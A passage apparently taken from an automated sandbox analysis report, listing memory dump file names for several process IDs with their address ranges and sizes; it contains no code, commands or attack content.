                                                                      • memory/1516-2-0x0000000000000000-mapping.dmp
                                                                      • memory/1516-3-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/1516-4-0x0000000001DB0000-0x0000000001DB1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1516-5-0x000000001AC40000-0x000000001AC41000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1516-21-0x00000000024C0000-0x00000000024C1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1516-20-0x000000001B860000-0x000000001B861000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1516-19-0x000000001B760000-0x000000001B761000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1516-6-0x00000000022C0000-0x00000000022C1000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1516-9-0x000000001C310000-0x000000001C311000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1516-18-0x000000001B650000-0x000000001B651000-memory.dmp
                                                                        Filesize

                                                                        4KB

                                                                      • memory/1520-34-0x0000000000000000-mapping.dmp
                                                                      • memory/1520-36-0x000007FEF58A0000-0x000007FEF628C000-memory.dmp
                                                                        Filesize

                                                                        9.9MB

                                                                      • memory/1552-116-0x0000000000000000-mapping.dmp
                                                                      • memory/1560-98-0x0000000000000000-mapping.dmp
                                                                      • memory/1576-101-0x0000000000000000-mapping.dmp
                                                                      • memory/1584-1-0x00000000007D0000-0x00000000007E1000-memory.dmp
                                                                        Filesize

                                                                        68KB

                                                                      • memory/1584-0-0x00000000004D0000-0x00000000007C1000-memory.dmp
                                                                        Filesize

                                                                        2.9MB

                                                                      • memory/1600-99-0x0000000000000000-mapping.dmp
                                                                      • memory/1644-100-0x0000000000000000-mapping.dmp
                                                                      • memory/1652-115-0x0000000000000000-mapping.dmp
                                                                      • memory/1652-97-0x0000000000000000-mapping.dmp
                                                                      • memory/1668-121-0x0000000000000000-mapping.dmp
                                                                      • memory/1712-110-0x0000000000000000-mapping.dmp
                                                                      • memory/1828-106-0x0000000000000000-mapping.dmp
                                                                      • memory/1876-125-0x0000000000000000-mapping.dmp
                                                                      • memory/1972-93-0x0000000000000000-mapping.dmp